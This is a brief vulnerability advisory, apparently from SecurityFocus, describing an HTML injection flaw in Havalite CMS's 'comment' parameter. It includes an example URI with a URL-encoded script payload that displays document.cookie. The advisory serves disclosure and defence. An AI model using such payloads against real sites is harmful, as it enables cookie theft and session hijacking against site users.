Havalite CMS 'comment' Parameter HTML Injection Vulnerability

Attackers can exploit this issue through a browser.

The following example URI is available:

http://www.example.com/?p=1 "comment" with value %E2%80%9C%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E


 

Privacy Statement
Copyright 2010, SecurityFocus